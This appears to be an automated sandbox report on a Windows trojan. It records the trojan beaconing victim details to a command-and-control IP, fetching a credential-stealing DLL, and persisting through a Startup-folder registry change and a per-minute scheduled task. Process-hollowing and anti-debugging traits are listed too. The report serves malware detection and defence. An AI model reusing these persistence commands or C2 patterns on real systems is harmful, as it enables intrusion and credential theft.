Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 31 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.15 Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004081B0 CreateMutexW,GetLastError,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_004081B0
Source: global traffic HTTP traffic detected: GET /Lkb2dxj3/cred.dll HTTP/1.1Host: 185.215.113.15
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00402410 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown, 0_2_00402410
Source: yIF7nMz573.exe, 00000000.00000002.271960953.0000000000E9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: yIF7nMz573.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004061E0 0_2_004061E0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00428610 0_2_00428610
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00404710 0_2_00404710
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0042B947 0_2_0042B947
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0042BA67 0_2_0042BA67
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00428AA8 0_2_00428AA8
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0042DCA0 0_2_0042DCA0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0042CCBD 0_2_0042CCBD
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00405D80 0_2_00405D80
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041CF57 0_2_0041CF57
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_004061E0 10_2_004061E0
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00428610 10_2_00428610
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00404710 10_2_00404710
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0042B947 10_2_0042B947
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0042BA67 10_2_0042BA67
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00428AA8 10_2_00428AA8
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0042DCA0 10_2_0042DCA0
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0042CCBD 10_2_0042CCBD
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00405D80 10_2_00405D80
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041CF57 10_2_0041CF57
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: String function: 00418910 appears 44 times
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: String function: 00416FE0 appears 119 times
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: String function: 00418910 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: String function: 00416FE0 appears 119 times
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: yIF7nMz573.exe Virustotal: Detection: 36%
Source: yIF7nMz573.exe ReversingLabs: Detection: 46%
Source: C:\Users\user\Desktop\yIF7nMz573.exe File read: C:\Users\user\Desktop\yIF7nMz573.exe
Source: yIF7nMz573.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\yIF7nMz573.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\yIF7nMz573.exe "C:\Users\user\Desktop\yIF7nMz573.exe"
Source: C:\Users\user\Desktop\yIF7nMz573.exe Process created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe"
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
Source: C:\Users\user\Desktop\yIF7nMz573.exe Process created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe"
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: C:\Users\user\Desktop\yIF7nMz573.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe File created: C:\Users\user\AppData\Roaming\110809d565579c
Source: C:\Users\user\Desktop\yIF7nMz573.exe File created: C:\Users\user\AppData\Local\Temp\62eca45584
Source: classification engine Classification label: mal100.troj.evad.winEXE@13/3@0/1
Source: C:\Users\user\Desktop\yIF7nMz573.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00EA26A6 CreateToolhelp32Snapshot,Module32First, 0_2_00EA26A6
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Mutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_01
Source: C:\Users\user\Desktop\yIF7nMz573.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: yIF7nMz573.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 4C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdbhQE source: yIF7nMz573.exe, bguuwe.exe.0.dr
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: bguuwe.exe, bguuwe.exe, 0000000A.00000003.309573312.0000000002680000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 0000000A.00000002.310851152.0000000000400000.00000040.00000001.01000000.00000004.sdmp, bguuwe.exe, 00000013.00000003.436338971.0000000001010000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 00000013.00000002.437486522.0000000000400000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdb source: yIF7nMz573.exe, bguuwe.exe.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\yIF7nMz573.exe Unpacked PE file: 0.2.yIF7nMz573.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 10.2.bguuwe.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 19.2.bguuwe.exe.400000.0.unpack
Source: C:\Users\user\Desktop\yIF7nMz573.exe Unpacked PE file: 0.2.yIF7nMz573.exe.400000.0.unpack .text:ER;.data:W;.sez:W;.yasufo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 10.2.bguuwe.exe.400000.0.unpack .text:ER;.data:W;.sez:W;.yasufo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 19.2.bguuwe.exe.400000.0.unpack .text:ER;.data:W;.sez:W;.yasufo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418956 push ecx; ret 0_2_00418969
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00EA5D2A push ecx; iretd 0_2_00EA5D37
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00EA4F63 push es; iretd 0_2_00EA4F83
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00418956 push ecx; ret 10_2_00418969
Source: yIF7nMz573.exe Static PE information: section name: .sez
Source: yIF7nMz573.exe Static PE information: section name: .yasufo
Source: bguuwe.exe.0.dr Static PE information: section name: .sez
Source: bguuwe.exe.0.dr Static PE information: section name: .yasufo

Persistence and Installation Behavior

Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\yIF7nMz573.exe File created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe

Boot Survival

Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
Source: C:\Users\user\Desktop\yIF7nMz573.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6844 Thread sleep count: 154 > 30
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6844 Thread sleep time: -4620000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6848 Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6840 Thread sleep count: 154 > 30
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6840 Thread sleep time: -4620000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6612 Thread sleep count: 142 > 30
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6612 Thread sleep time: -4260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6828 Thread sleep time: -390000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6852 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6840 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6844 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6612 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\yIF7nMz573.exe API coverage: 6.2 %
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe API coverage: 7.1 %
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004051C0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics, 0_2_004051C0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004244D2 FindFirstFileExW, 0_2_004244D2
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_004244D2 FindFirstFileExW, 10_2_004244D2
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 50000
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418737 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00418737
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00425728 GetProcessHeap, 0_2_00425728
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041F362 mov eax, dword ptr fs:[00000030h] 0_2_0041F362
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041B5D1 mov eax, dword ptr fs:[00000030h] 0_2_0041B5D1
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00EA1F83 push dword ptr fs:[00000030h] 0_2_00EA1F83
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041F362 mov eax, dword ptr fs:[00000030h] 10_2_0041F362
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041B5D1 mov eax, dword ptr fs:[00000030h] 10_2_0041B5D1
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418737 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00418737
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041889C SetUnhandledExceptionFilter, 0_2_0041889C
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00417E33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417E33
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041DED6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041DED6
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00418737 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00418737
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041889C SetUnhandledExceptionFilter, 10_2_0041889C
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00417E33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00417E33
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041DED6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_0041DED6

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00403440 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree, 0_2_00403440
Source: C:\Users\user\Desktop\yIF7nMz573.exe Process created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe"
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Roaming\110809d565579c\cred.dll VolumeInformation
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418557 cpuid 0_2_00418557
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418971 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00418971
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00427B81 _free,_free,_free,GetTimeZoneInformation,_free, 0_2_00427B81
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004051C0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics, 0_2_004051C0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00413860 Sleep,IsUserAnAdmin,GetUserNameW,GetComputerNameExW, 0_2_00413860

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP